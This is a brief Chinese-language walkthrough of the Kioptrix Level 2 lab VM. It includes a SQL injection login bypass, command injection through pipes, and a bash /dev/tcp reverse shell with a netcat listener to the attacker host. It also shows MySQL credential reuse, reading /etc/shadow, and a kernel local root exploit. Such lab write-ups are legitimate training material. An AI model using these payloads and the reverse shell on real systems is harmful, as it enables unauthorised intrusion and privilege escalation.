Kioptrix Level 2-writeup
0x00 信息收集
目标机器 | 16.16.16.178 |
---|---|
kali攻击机 | 16.16.16.177 |
使用nmap来个端口服务扫描
浏览器打开http://16.16.16.178看看
第一眼看上去就像是存在SQL注入,抓包跑了下果然是存在万能密码的
0x01 漏洞利用
以账号'0 or 1=1 #
和任意密码就可以成功登录,登录后的页面是这样,感觉是存在一个任意命令执行的漏洞
ping了下路由
直接使用命令管道符连接命令可以执行任意命令
kali使用nc -lvp 1234
监听,直接bash -i >& /dev/tcp/16.16.16.177/1234 0>&1
拿shell
不过是个低权限,需要提权
0x02 提权
将shell升级一下python -c 'import pty; pty.spawn("/bin/bash")'
登录mysql
mysql -u john -phiroshima
在mysql数据库的user表找到了mysql的root密码hash
在线查一下是hiroshima
使用root登录mysql
mysql -u root -phiroshima
mysql的root权限是受限的,本来还准备使用system cat /etc/shadow查看下hash值。
只能从别的地方找下线索
从数据库webapp
的user表找到web登录界面的账号密码。
试了下ssh,发现密码不对。
思绪一下断了……
突然想到还可以从exp入手呀,赶紧看看版本
uname -a
lsb_release -a
那就选这个9542吧
在shell下找个可以读写的
获取到root权限。